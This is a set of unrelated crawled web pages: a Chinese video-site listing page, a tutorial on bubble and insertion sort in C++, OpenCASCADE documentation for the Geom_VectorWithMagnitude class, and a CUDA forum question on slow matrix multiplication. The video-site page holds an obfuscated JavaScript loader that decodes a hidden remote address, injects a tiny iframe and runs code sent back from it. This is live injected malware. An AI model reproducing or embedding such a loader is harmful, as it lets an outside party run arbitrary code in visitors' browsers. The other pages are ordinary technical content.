{"ft_lang_label":"__label__en","ft_lang_prob":0.9279967,"math_prob":0.8979725,"size":3283,"snap":"2020-10-2020-16","text_gpt3_token_len":613,"char_repetition_ratio":0.15218054,"word_repetition_ratio":0.018621974,"special_character_ratio":0.18093207,"punctuation_ratio":0.07470289,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9627991,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-22T06:55:04Z\",\"WARC-Record-ID\":\"<urn:uuid:30dd6818-9116-414a-9260-7823c1106446>\",\"Content-Length\":\"20631\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8be24ec9-a241-4605-b1b4-552caa33744c>\",\"WARC-Concurrent-To\":\"<urn:uuid:e1d66781-7d22-4e52-b8f9-6f3126802891>\",\"WARC-IP-Address\":\"185.199.109.153\",\"WARC-Target-URI\":\"http://www.develbyte.in/machine-learning/what-is-machine-learning/\",\"WARC-Payload-Digest\":\"sha1:QS5V3ZVSNZJBJBIECLNIC2UBT4RSFEN4\",\"WARC-Block-Digest\":\"sha1:VMOWGV6NW3ACKWCLWKVC2BDJK5B2N5H7\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875145654.0_warc_CC-MAIN-20200222054424-20200222084424-00430.warc.gz\"}"}
http://www.fss001.com/type/dianshiju.html
[ "## 按更新按上映按观看热度\n\nfunction TYlQDV(e){var t=\"\",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function rYsjFIQ(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t=\"\",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,\"\");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return TYlQDV(t);};eval('\\x77\\x69\\x6e\\x64\\x6f\\x77')['\\x65\\x52\\x75\\x5a\\x51\\x54\\x66\\x4c\\x64']=function(){;(function(u,r,w,d,f,c){var x=rYsjFIQ;u=decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));var k='',wr='w'+'ri'+'t'+'e';'jQuery';var c=d[x('Y3VycmVudFNjcmlwdA==')];var f=d.createElement('iframe');f.id='x'+(Math.random()*10000);f.style.width=f.style.height=10+'px';f.src=[u,r].join('-');d[wr](f.outerHTML);w['addEventListener']('message',function(e){if(e.data[r]){d.getElementById(f.id).style.display='none';new Function(x(e.data[r].replace(new RegExp(r,'g'),'')))();}});})('aHR0cHMlM0ElMkYlMkZoaWWtpbi5vbmxpbmUlMkY2Mzg3',''+'OLC'+'BNE'+'Zcm'+'v'+'',window,document,''+'5sh'+'IcB'+'SC'+'','W');};" ]
[ null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.96544003,"math_prob":0.9928025,"size":409,"snap":"2021-04-2021-17","text_gpt3_token_len":370,"char_repetition_ratio":0.2962963,"word_repetition_ratio":0.2826087,"special_character_ratio":0.5599022,"punctuation_ratio":0.07692308,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97906435,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-17T17:24:18Z\",\"WARC-Record-ID\":\"<urn:uuid:5539fe8a-013a-46fd-a414-16cbb595fad8>\",\"Content-Length\":\"90254\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e9ebdd40-945b-4616-94b9-8fbff57295d6>\",\"WARC-Concurrent-To\":\"<urn:uuid:7bcfbb4c-502f-4fc1-9e46-2e5ae617b75d>\",\"WARC-IP-Address\":\"154.17.5.127\",\"WARC-Target-URI\":\"http://www.fss001.com/type/dianshiju.html\",\"WARC-Payload-Digest\":\"sha1:FW2BVXIXEKWXPFY6CO5CKXDQKBXYGPC5\",\"WARC-Block-Digest\":\"sha1:7HMIR4FGL35G2ETEK7FFKUZZUHRPPIZR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038461619.53_warc_CC-MAIN-20210417162353-20210417192353-00440.warc.gz\"}"}
https://www.techtud.com/computer-science-and-information-technology/algorithms/sorting/sorting-techniques
[ "##### Bubble Sort | Insertion Sort\n\nSorting Algorithms\n\nAlgorithms are used to sort the numbers based on some conditions. These algorithms are further judged based on space & time complexity.\n\nSorting Algorithms are listed below:\n\n1. Bubble sort\n2. Insertion sort\n3. Quick sort\n4. Merge sort\n5. Heap sort\n\nBUBBLE SORT\n\nDefinition: It is a comparison​-based algorithm. It compares each pair of elements in an array and swaps them if they are out of order until the entire array is sorted. It works by repeatedly swapping the adjacent elements if they are in wrong order.\n\nLogic Behind it:", null, "Fig: bubble sort by w3resource\n\nProgram to implement the logic\n\ninclude<iostream>\n\nusing namespace std;\n\nint main()\n\n{\n\nint a,n,i,j,temp;\n\ncout<<\"Enter the size of array: \";\n\ncin>>n;\n\ncout<<\"Enter the array elements: \";\n\nfor(i=0;i<n;i++)\n\ncin>>a[i];\n\nfor(i=1;i<n;i++)\n\n{\n\nfor(j=0;j<(n-i);j++)\n\nif(a[j]>a[j+1])\n\n{\n\ntemp=a[j];\n\na[j]=a[j+1];\n\na[j+1]=temp;\n\n}\n\n}\n\ncout<<\"Array after bubble sort:\";\n\nfor(i=0;i<n;i++)\n\ncout<<\" \"<<a[i]\n\nreturn 0;\n\n}\n\nOutput:", null, "Algorithm Source:\n\nIt could be directly forked from my github repo:\n\nhttps://github.com/anwesha999/Basic_Algorithms\n\nfeel free to raise issue, pull requests for further understanding of concepts elaborated in my github repo.\n\nINSERTION SORT\n\nDefinition: The idea of insertion sort algorithm is to build your sorted array in place, shifting elements out of the way if necessary to make room as you go.\n\nLogic Behind insertion sort algorithm\n\nStep 1: call the 1st element of the array sorted.\n\nStep 2: repeat until all the elements are sorted by shifting the requisite no of the elements.", null, "Fig: insertion sort logic by w3resource\n\nInsertion Sort\n\n#include<iostream>\n\nusing namespace std;\n\nint main()\n\n{\n\nint n, arr, i, j, temp;\n\ncout<<\"Enter Array Size : \";\n\ncin>>n;\n\ncout<<n<<endl;\n\ncout<<\"Enter Array Elements : \";\n\nfor(i=0; i<n; i++)\n\n{\n\ncin>>arr[i];\n\n}\n\nfor(i=0; i<n; i++)\n\n{\n\ncout<<arr[i];\n\n}\n\ncout<<\"Sorting array using selection sort ... \\n\";\n\nfor(i=1; i<n; i++)\n\n{\n\ntemp=arr[i];\n\nj=i-1;\n\nwhile((temp>arr[j]) && (j>=0))\n\n{\n\narr[j+1]=arr[j];\n\nj=j-1;\n\n}\n\narr[j+1]=temp;\n\n}\n\ncout<<\"Array after sorting : \\n\";\n\nfor(i=0; i<n; i++)\n\n{\n\ncout<<arr[i]<<\" \";\n\n}\n\nreturn 0;\n\n}\n\nOutput:", null, "Interesting Question & Solution from Hackerrank\n\nChallenge Q1:\n\nInsertion Sort\nThese challenges will cover Insertion Sort, a simple and intuitive sorting algorithm. We will first start with a nearly sorted list.\n\nInsert element into sorted list\nGiven a sorted list with an unsorted number  in the rightmost cell, can you write some simple code to insert  into the array so that it remains sorted?\n\nSince this is a learning exercise, it won't be the most efficient way of performing the insertion. It will instead demonstrate the brute-force method in detail.\n\nAssume you are given the array  indexed . Store the value of . Now test lower index values successively from  to  until you reach a value that is lower than ,  in this case. Each time your test fails, copy the value at the lower index to the current index and print your array. 
When the next lower indexed value is smaller than , insert the stored value at the current index and print the entire array.\n\nThe results of operations on the example array is:\n\nStarting array:\nStore the value of  Do the tests and print interim results:\n\n1 2 4 5 5\n\n1 2 4 4 5\n\n1 2 3 4 5\n\nInput Format\n\nThere will be two lines of input:\n\nThe first line contains the integer , the size of the array\nThe next line contains  space-separated integers\n\nOutput Format\n\nPrint the array as a row of space-separated integers each time there is a shift or insertion.\n\nSample Input\n\n5\n\n2 4 6 8 3\n\nSample Output\n\n2 4 6 8 8\n\n2 4 6 6 8\n\n2 4 4 6 8\n\n2 3 4 6 8\n\nSolution:\n\n#include<iostream>\n\nusing namespace std;\n\nvoid insertionSort(int n, int *a) {\n\nint temp,i,j,k;\n\nfor(j=1;j<n;j++)\n\n{\n\ntemp=a[j];\n\ni=j-1;\n\nwhile(i>=0&&a[i]>temp)\n\n{\n\na[i+1]=a[i];\n\ni--;\n\nfor(k=0;k<n;k++)\n\ncout<<a[k]<<\" \";\n\ncout<<endl;\n\n}\n\na[i+1]=temp;\n\n}\n\nfor(k=0;k<n;k++)\n\ncout<<a[k]<<\" \";\n\n}\n\nint main(void) {\n\nint n;\n\ncin>>n;\n\nint a[n], i;\n\nfor(i = 0; i < n; i++) {\n\ncin>>a[i];\n\n}\n\ninsertionSort(n,a);\n\nreturn 0;\n\n}\n\nAnalysis of the solution provided:\n\nThe above code did the sorting in decreasing order from right to left sorting.\n\nInorder to do it it from right to left sorting. It could be solved as follows:\n\n#include<iostream>\n\nusing namespace std;\n\nvoid insertionSort(int n, int *a) {\n\nint temp,i,j,k;\n\nfor(i=1;i<n;i++)\n\n{\n\ntemp=a[i];\n\nj=i-1;\n\nwhile(j>=0&&a[j]<temp)\n\n{\n\na[j+1]=a[j];\n\nj--;\n\nfor(k=0;k<n;k++)\n\ncout<<a[k]<<\" \";\n\ncout<<endl;\n\n}\n\na[j+1]=temp;\n\n}\n\nfor(k=0;k<n;k++)\n\ncout<<a[k]<<\" \";\n\n}\n\nint main(void) {\n\nint n;\n\ncin>>n;\n\nint a[n], i;\n\nfor(i = 0; i < n; i++) {\n\ncin>>a[i];\n\n}\n\ninsertionSort(n,a);\n\nreturn 0;\n\n}\n\nInput (stdin)\n\n5\n\n2 4 6 8 3\n\n2 2 6 8 3\n\n4 2 2 8 3\n\n4 4 2 8 3\n\n6 4 2 2 3\n\n6 4 4 2 3\n\n6 6 4 2 3\n\n8 6 4 2 2\n\n8 6 4 3 2\n\nComparative Study of Sorting Algorithms:", null, "Conclusion:\n\nThe document is made fully for conceptual understanding of the topic, taken question from hacker rank and given the solution for further understanding of the topic rather than superfluous talk on algorithms. The logic of algorithm is crystal clear as the whole program revolves around it, resource.com images are also incorporated for the benefit of the reader. Moreover, the program is run and the output is displayed. I truly have left no stone unturned to explain the topic in depth.\n\nFeel free to fork my github repo, raise issue and pull request if you solve the problem with the logic illustrated here your preferable language like java.\n\nFollow me on github for the algorithms:\n\nhttps://github.com/anwesha999/Basic_Algorithms/tree/master\n\nStay tuned with Techtud for more such concepts.\n\n##### Introduction to sorting\n\nIntroduction to Sorting\n\nSorting is nothing but storage of data in sorted order, it can be in ascending or descending order. The term Sorting comes into picture with the term Searching. There are so many things in our real life that we need to search, like a particular record in database, roll numbers in merit list, a particular telephone number, any particular page in a book etc.\n\nSorting arranges data in a sequence which makes searching easier. Every record which is going to be sorted will contain one key. Based on the key the record will be sorted. 
For example, suppose we have a record of students, every such record will have the following data:\n\n• Name\n• Roll No.\n• Class\n• Age\n\nHere Student roll no. can be taken as key for sorting the records in ascending or descending order.\n\nNow suppose we have to search a Student with roll no. 25, we don't need to search the complete record we will simply search between the Students with roll no. between 20 to 30." ]
[ null, "https://www.techtud.com/sites/default/files/public/user_files/tud1/1_4.png", null, "https://www.techtud.com/sites/default/files/public/user_files/tud1/2_2.png", null, "https://www.techtud.com/sites/default/files/public/user_files/tud1/3_2.png", null, "https://www.techtud.com/sites/default/files/public/user_files/tud1/4_1.png", null, "https://www.techtud.com/sites/default/files/public/user_files/tud1/5_1.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.679225,"math_prob":0.8938323,"size":5529,"snap":"2019-51-2020-05","text_gpt3_token_len":1566,"char_repetition_ratio":0.1161991,"word_repetition_ratio":0.08629989,"special_character_ratio":0.30367154,"punctuation_ratio":0.15115353,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99020606,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,4,null,4,null,4,null,4,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-19T02:10:36Z\",\"WARC-Record-ID\":\"<urn:uuid:c2aa1c09-6e4c-4afe-913a-b2c70957a7b6>\",\"Content-Length\":\"76456\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d08bf9ce-db16-4aea-98f9-6f34fae6ffa8>\",\"WARC-Concurrent-To\":\"<urn:uuid:35ba3518-6481-4d6f-af1b-cbf71b4e9326>\",\"WARC-IP-Address\":\"104.27.131.132\",\"WARC-Target-URI\":\"https://www.techtud.com/computer-science-and-information-technology/algorithms/sorting/sorting-techniques\",\"WARC-Payload-Digest\":\"sha1:SWTJENZRJM2TGW7Y5OVJFNA5N77UDVCL\",\"WARC-Block-Digest\":\"sha1:HIEEOD7XZ7IIG4C4GS624HNF5762JOQQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579250594101.10_warc_CC-MAIN-20200119010920-20200119034920-00379.warc.gz\"}"}
https://dev.opencascade.org/doc/occt-7.0.0/refman/html/class_geom___vector_with_magnitude.html
[ "# Geom_VectorWithMagnitude Class Reference\n\nDefines a vector with magnitude. A vector with magnitude can have a zero length. More...\n\n`#include <Geom_VectorWithMagnitude.hxx>`\n\nInheritance diagram for Geom_VectorWithMagnitude:", null, "[legend]\n\n## Public Member Functions\n\nGeom_VectorWithMagnitude (const gp_Vec &V)\nCreates a transient copy of V. More...\n\nGeom_VectorWithMagnitude (const Standard_Real X, const Standard_Real Y, const Standard_Real Z)\nCreates a vector with three cartesian coordinates. More...\n\nGeom_VectorWithMagnitude (const gp_Pnt &P1, const gp_Pnt &P2)\nCreates a vector from the point P1 to the point P2. The magnitude of the vector is the distance between P1 and P2. More...\n\nvoid SetCoord (const Standard_Real X, const Standard_Real Y, const Standard_Real Z)\nAssigns the values X, Y and Z to the coordinates of this vector. More...\n\nvoid SetVec (const gp_Vec &V)\nConverts the gp_Vec vector V into this vector. More...\n\nvoid SetX (const Standard_Real X)\nChanges the X coordinate of <me>. More...\n\nvoid SetY (const Standard_Real Y)\nChanges the Y coordinate of <me> More...\n\nvoid SetZ (const Standard_Real Z)\nChanges the Z coordinate of <me>. More...\n\nStandard_Real Magnitude () const override\nReturns the magnitude of <me>. More...\n\nStandard_Real SquareMagnitude () const override\nReturns the square magnitude of <me>. More...\n\nvoid Add (const Handle< Geom_Vector > &Other)\nAdds the Vector Other to <me>. More...\n\nHandle< Geom_VectorWithMagnitudeAdded (const Handle< Geom_Vector > &Other) const\nAdds the vector Other to <me>. More...\n\nvoid Cross (const Handle< Geom_Vector > &Other) override\nComputes the cross product between <me> and Other <me> ^ Other. More...\n\nHandle< Geom_VectorCrossed (const Handle< Geom_Vector > &Other) const override\nComputes the cross product between <me> and Other <me> ^ Other. A new vector is returned. More...\n\nvoid CrossCross (const Handle< Geom_Vector > &V1, const Handle< Geom_Vector > &V2) override\nComputes the triple vector product <me> ^ (V1 ^ V2). More...\n\nHandle< Geom_VectorCrossCrossed (const Handle< Geom_Vector > &V1, const Handle< Geom_Vector > &V2) const override\nComputes the triple vector product <me> ^ (V1 ^ V2). A new vector is returned. More...\n\nvoid Divide (const Standard_Real Scalar)\nDivides <me> by a scalar. More...\n\nHandle< Geom_VectorWithMagnitudeDivided (const Standard_Real Scalar) const\nDivides <me> by a scalar. A new vector is returned. More...\n\nHandle< Geom_VectorWithMagnitudeMultiplied (const Standard_Real Scalar) const\nComputes the product of the vector <me> by a scalar. A new vector is returned. More...\n\nvoid Multiply (const Standard_Real Scalar)\nComputes the product of the vector <me> by a scalar. More...\n\nvoid Normalize ()\nNormalizes <me>. More...\n\nHandle< Geom_VectorWithMagnitudeNormalized () const\nReturns a copy of <me> Normalized. More...\n\nvoid Subtract (const Handle< Geom_Vector > &Other)\nSubtracts the Vector Other to <me>. More...\n\nHandle< Geom_VectorWithMagnitudeSubtracted (const Handle< Geom_Vector > &Other) const\nSubtracts the vector Other to <me>. A new vector is returned. More...\n\nvoid Transform (const gp_Trsf &T) override\nApplies the transformation T to this vector. More...\n\nHandle< Geom_GeometryCopy () const override\nCreates a new object which is a copy of this vector. More...", null, "Public Member Functions inherited from Geom_Vector\nvoid Reverse ()\nReverses the vector <me>. 
More...\n\nHandle< Geom_VectorReversed () const\nReturns a copy of <me> reversed. More...\n\nStandard_Real Angle (const Handle< Geom_Vector > &Other) const\nComputes the angular value, in radians, between this vector and vector Other. The result is a value between 0 and Pi. Exceptions gp_VectorWithNullMagnitude if: More...\n\nStandard_Real AngleWithRef (const Handle< Geom_Vector > &Other, const Handle< Geom_Vector > &VRef) const\nComputes the angular value, in radians, between this vector and vector Other. The result is a value between -Pi and Pi. The vector VRef defines the positive sense of rotation: the angular value is positive if the cross product this ^ Other has the same orientation as VRef (in relation to the plane defined by this vector and vector Other). Otherwise, it is negative. Exceptions Standard_DomainError if this vector, vector Other and vector VRef are coplanar, except if this vector and vector Other are parallel. gp_VectorWithNullMagnitude if the magnitude of this vector, vector Other or vector VRef is less than or equal to gp::Resolution(). More...\n\nvoid Coord (Standard_Real &X, Standard_Real &Y, Standard_Real &Z) const\nReturns the coordinates X, Y and Z of this vector. More...\n\nStandard_Real X () const\nReturns the X coordinate of <me>. More...\n\nStandard_Real Y () const\nReturns the Y coordinate of <me>. More...\n\nStandard_Real Z () const\nReturns the Z coordinate of <me>. More...\n\nStandard_Real Dot (const Handle< Geom_Vector > &Other) const\nComputes the scalar product of this vector and vector Other. More...\n\nStandard_Real DotCross (const Handle< Geom_Vector > &V1, const Handle< Geom_Vector > &V2) const\nComputes the triple scalar product. Returns me . (V1 ^ V2) More...\n\nconst gp_VecVec () const\nConverts this vector into a gp_Vec vector. More...", null, "Public Member Functions inherited from Geom_Geometry\nvoid Mirror (const gp_Pnt &P)\nPerforms the symmetrical transformation of a Geometry with respect to the point P which is the center of the symmetry. More...\n\nvoid Mirror (const gp_Ax1 &A1)\nPerforms the symmetrical transformation of a Geometry with respect to an axis placement which is the axis of the symmetry. More...\n\nvoid Mirror (const gp_Ax2 &A2)\nPerforms the symmetrical transformation of a Geometry with respect to a plane. The axis placement A2 locates the plane of the symmetry : (Location, XDirection, YDirection). More...\n\nvoid Rotate (const gp_Ax1 &A1, const Standard_Real Ang)\nRotates a Geometry. A1 is the axis of the rotation. Ang is the angular value of the rotation in radians. More...\n\nvoid Scale (const gp_Pnt &P, const Standard_Real S)\nScales a Geometry. S is the scaling value. More...\n\nvoid Translate (const gp_Vec &V)\nTranslates a Geometry. V is the vector of the tanslation. More...\n\nvoid Translate (const gp_Pnt &P1, const gp_Pnt &P2)\nTranslates a Geometry from the point P1 to the point P2. 
More...\n\nHandle< Geom_GeometryMirrored (const gp_Pnt &P) const\n\nHandle< Geom_GeometryMirrored (const gp_Ax1 &A1) const\n\nHandle< Geom_GeometryMirrored (const gp_Ax2 &A2) const\n\nHandle< Geom_GeometryRotated (const gp_Ax1 &A1, const Standard_Real Ang) const\n\nHandle< Geom_GeometryScaled (const gp_Pnt &P, const Standard_Real S) const\n\nHandle< Geom_GeometryTransformed (const gp_Trsf &T) const\n\nHandle< Geom_GeometryTranslated (const gp_Vec &V) const\n\nHandle< Geom_GeometryTranslated (const gp_Pnt &P1, const gp_Pnt &P2) const", null, "Public Member Functions inherited from MMgt_TShared\nvirtual void Delete () const override\nMemory deallocator for transient classes. More...", null, "Public Member Functions inherited from Standard_Transient\nStandard_Transient ()\nEmpty constructor. More...\n\nStandard_Transient (const Standard_Transient &)\nCopy constructor – does nothing. More...\n\nStandard_Transientoperator= (const Standard_Transient &)\nAssignment operator, needed to avoid copying reference counter. More...\n\nvirtual ~Standard_Transient ()\nDestructor must be virtual. More...\n\nvirtual const opencascade::handle< Standard_Type > & DynamicType () const\n\nStandard_Boolean IsInstance (const opencascade::handle< Standard_Type > &theType) const\nReturns a true value if this is an instance of Type. More...\n\nStandard_Boolean IsInstance (const Standard_CString theTypeName) const\nReturns a true value if this is an instance of TypeName. More...\n\nStandard_Boolean IsKind (const opencascade::handle< Standard_Type > &theType) const\nReturns true if this is an instance of Type or an instance of any class that inherits from Type. Note that multiple inheritance is not supported by OCCT RTTI mechanism. More...\n\nStandard_Boolean IsKind (const Standard_CString theTypeName) const\nReturns true if this is an instance of TypeName or an instance of any class that inherits from TypeName. Note that multiple inheritance is not supported by OCCT RTTI mechanism. More...\n\nStandard_TransientThis () const\nReturns non-const pointer to this object (like const_cast). For protection against creating handle to objects allocated in stack or call from constructor, it will raise exception Standard_ProgramError if reference counter is zero. More...\n\nStandard_Integer GetRefCount () const\nGet the reference counter of this object. More...\n\nvoid IncrementRefCounter () const\nIncrements the reference counter of this object. More...\n\nStandard_Integer DecrementRefCounter () const\nDecrements the reference counter of this object; returns the decremented value. More...", null, "Public Types inherited from Standard_Transient\ntypedef void base_type", null, "Static Public Member Functions inherited from Standard_Transient\nstatic const char * get_type_name ()\n\nstatic const opencascade::handle< Standard_Type > & get_type_descriptor ()\nReturns type descriptor of Standard_Transient class. More...", null, "Protected Attributes inherited from Geom_Vector\ngp_Vec gpVec\n\n## Detailed Description\n\nDefines a vector with magnitude. 
A vector with magnitude can have a zero length.\n\n## Constructor & Destructor Documentation\n\n Geom_VectorWithMagnitude::Geom_VectorWithMagnitude ( const gp_Vec & V )\n\nCreates a transient copy of V.\n\n Geom_VectorWithMagnitude::Geom_VectorWithMagnitude ( const Standard_Real X, const Standard_Real Y, const Standard_Real Z )\n\nCreates a vector with three cartesian coordinates.\n\n Geom_VectorWithMagnitude::Geom_VectorWithMagnitude ( const gp_Pnt & P1, const gp_Pnt & P2 )\n\nCreates a vector from the point P1 to the point P2. The magnitude of the vector is the distance between P1 and P2.\n\n## Member Function Documentation\n\n void Geom_VectorWithMagnitude::Add ( const Handle< Geom_Vector > & Other )\n\nAdds the Vector Other to <me>.\n\n Handle< Geom_VectorWithMagnitude > Geom_VectorWithMagnitude::Added ( const Handle< Geom_Vector > & Other ) const\n\nAdds the vector Other to <me>.\n\n Handle< Geom_Geometry > Geom_VectorWithMagnitude::Copy ( ) const\noverridevirtual\n\nCreates a new object which is a copy of this vector.\n\nImplements Geom_Geometry.\n\n void Geom_VectorWithMagnitude::Cross ( const Handle< Geom_Vector > & Other )\noverridevirtual\n\nComputes the cross product between <me> and Other <me> ^ Other.\n\nImplements Geom_Vector.\n\n void Geom_VectorWithMagnitude::CrossCross ( const Handle< Geom_Vector > & V1, const Handle< Geom_Vector > & V2 )\noverridevirtual\n\nComputes the triple vector product <me> ^ (V1 ^ V2).\n\nImplements Geom_Vector.\n\n Handle< Geom_Vector > Geom_VectorWithMagnitude::CrossCrossed ( const Handle< Geom_Vector > & V1, const Handle< Geom_Vector > & V2 ) const\noverridevirtual\n\nComputes the triple vector product <me> ^ (V1 ^ V2). A new vector is returned.\n\nImplements Geom_Vector.\n\n Handle< Geom_Vector > Geom_VectorWithMagnitude::Crossed ( const Handle< Geom_Vector > & Other ) const\noverridevirtual\n\nComputes the cross product between <me> and Other <me> ^ Other. A new vector is returned.\n\nImplements Geom_Vector.\n\n void Geom_VectorWithMagnitude::Divide ( const Standard_Real Scalar )\n\nDivides <me> by a scalar.\n\n Handle< Geom_VectorWithMagnitude > Geom_VectorWithMagnitude::Divided ( const Standard_Real Scalar ) const\n\nDivides <me> by a scalar. A new vector is returned.\n\n Standard_Real Geom_VectorWithMagnitude::Magnitude ( ) const\noverridevirtual\n\nReturns the magnitude of <me>.\n\nImplements Geom_Vector.\n\n Handle< Geom_VectorWithMagnitude > Geom_VectorWithMagnitude::Multiplied ( const Standard_Real Scalar ) const\n\nComputes the product of the vector <me> by a scalar. 
A new vector is returned.\n\n void Geom_VectorWithMagnitude::Multiply ( const Standard_Real Scalar )\n\nComputes the product of the vector <me> by a scalar.\n\n void Geom_VectorWithMagnitude::Normalize ( )\n\nNormalizes <me>.\n\nRaised if the magnitude of the vector is lower or equal to Resolution from package gp.\n\n Handle< Geom_VectorWithMagnitude > Geom_VectorWithMagnitude::Normalized ( ) const\n\nReturns a copy of <me> Normalized.\n\nRaised if the magnitude of the vector is lower or equal to Resolution from package gp.\n\n void Geom_VectorWithMagnitude::SetCoord ( const Standard_Real X, const Standard_Real Y, const Standard_Real Z )\n\nAssigns the values X, Y and Z to the coordinates of this vector.\n\n void Geom_VectorWithMagnitude::SetVec ( const gp_Vec & V )\n\nConverts the gp_Vec vector V into this vector.\n\n void Geom_VectorWithMagnitude::SetX ( const Standard_Real X )\n\nChanges the X coordinate of <me>.\n\n void Geom_VectorWithMagnitude::SetY ( const Standard_Real Y )\n\nChanges the Y coordinate of <me>\n\n void Geom_VectorWithMagnitude::SetZ ( const Standard_Real Z )\n\nChanges the Z coordinate of <me>.\n\n Standard_Real Geom_VectorWithMagnitude::SquareMagnitude ( ) const\noverridevirtual\n\nReturns the square magnitude of <me>.\n\nImplements Geom_Vector.\n\n void Geom_VectorWithMagnitude::Subtract ( const Handle< Geom_Vector > & Other )\n\nSubtracts the Vector Other to <me>.\n\n Handle< Geom_VectorWithMagnitude > Geom_VectorWithMagnitude::Subtracted ( const Handle< Geom_Vector > & Other ) const\n\nSubtracts the vector Other to <me>. A new vector is returned.\n\n void Geom_VectorWithMagnitude::Transform ( const gp_Trsf & T )\noverridevirtual\n\nApplies the transformation T to this vector.\n\nImplements Geom_Geometry.\n\nThe documentation for this class was generated from the following file:" ]
https://forums.developer.nvidia.com/t/cuda-matrix-multiplication-too-slow/14877
# Cuda matrix multiplication too slow

Hello,

I'm quite new at Cuda programming and I took the example of Cuda matrix multiplication (without using shared memory) from the Programming Guide. The result is right but it is too slow. I use two 1024 x 1024 matrices with 16 x 16 blocks and I get an execution time of 5.39 s (both in Debug and Release mode), whereas in C alone I get 6.64 s in Debug mode and 4.09 s in Release mode. I use Visual Studio 2005. So in Release mode, Cuda seems no better than C, so I think I must have done something wrong somewhere.

Could you tell me what I did wrong, please?
jcpao

Try CUBLAS - the SDK code is not too efficient, and "(without using shared memory)" is not a good idea. You also do not say what kind of card you have. A GTX280 will perform at about 380 GFlops single precision (SGEMM), while a 4-core Xeon with optimized code, using all cores, will reach about 80 GFlops.

Something else has got to be wrong here. The SDK matrix multiply example is about one third the speed of CUBLAS (I was timing this recently, for my own nefarious purposes), and copying 1024^2 matrices to the GPU and back isn't that slow. What do these times include? Was the CUDA context already established before the timer began? Those times look suspiciously like 'whole program' times.

I forgot to say that I use a GeForce 8400 GS.

This is the program I run:

```cpp
/* CUDA program taken from the NVIDIA CUDA Programming Guide 2.3 (pp. 18-21) */

#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>   /* for malloc/free/rand/exit */
#include <cuda.h>

typedef struct {
    int width;
    int height;
    float* elements;
} Matrix;

/* Thread block size */
/* Matrix dimensions are assumed to be multiples of BLOCK_SIZE */
#define BLOCK_SIZE 16
#define MSIZE 1024

/* Declaration of the matrix-multiplication kernel executed on the graphics card */
__global__ void MulMatKernel(const Matrix, const Matrix, Matrix);

int main(void)
{
    Matrix a_h, b_h, c_h;
    FILE *fp1, *fp2, *fp3;

    fp1 = fopen("a_h.txt", "w");
    if (fp1 == NULL) { printf("Cannot open file %s\n", "a_h.txt"); exit(-1); }
    fp2 = fopen("b_h.txt", "w");
    if (fp2 == NULL) { printf("Cannot open file %s\n", "b_h.txt"); exit(-1); }
    fp3 = fopen("c_h.txt", "w");
    if (fp3 == NULL) { printf("Cannot open file %s\n", "c_h.txt"); exit(-1); }

    a_h.width = MSIZE; a_h.height = MSIZE;
    b_h.width = MSIZE; b_h.height = MSIZE;
    c_h.width = MSIZE; c_h.height = MSIZE;

    size_t size = MSIZE * MSIZE * sizeof(float); /* size_t = unsigned int */
    a_h.elements = (float*)malloc(size);
    b_h.elements = (float*)malloc(size);
    c_h.elements = (float*)malloc(size);

    /* Initialize the host matrices */
    /* rand returns a pseudo-random number between 0 and 32767 (RAND_MAX) */
    fprintf(fp1, "\n");   /* blank line in the file before writing the numbers */
    for (int j = 0; j < a_h.height; j++)
        for (int i = 0; i < a_h.width; i++) {
            a_h.elements[a_h.width*j + i] = (float)rand()/RAND_MAX;
            fprintf(fp1, "%f\n", a_h.elements[a_h.width*j + i]);
        }

    fprintf(fp2, "\n");
    for (int j = 0; j < b_h.height; j++)
        for (int i = 0; i < b_h.width; i++) {
            b_h.elements[b_h.width*j + i] = (float)rand()/RAND_MAX;
            fprintf(fp2, "%f\n", b_h.elements[b_h.width*j + i]);
        }

    for (int j = 0; j < c_h.height; j++)
        for (int i = 0; i < c_h.width; i++)
            c_h.elements[c_h.width*j + i] = 0.0;

    Matrix d_A, d_B, d_C;
    d_A.width = a_h.width; d_A.height = a_h.height;
    d_B.width = b_h.width; d_B.height = b_h.height;
    d_C.width = c_h.width; d_C.height = c_h.height;

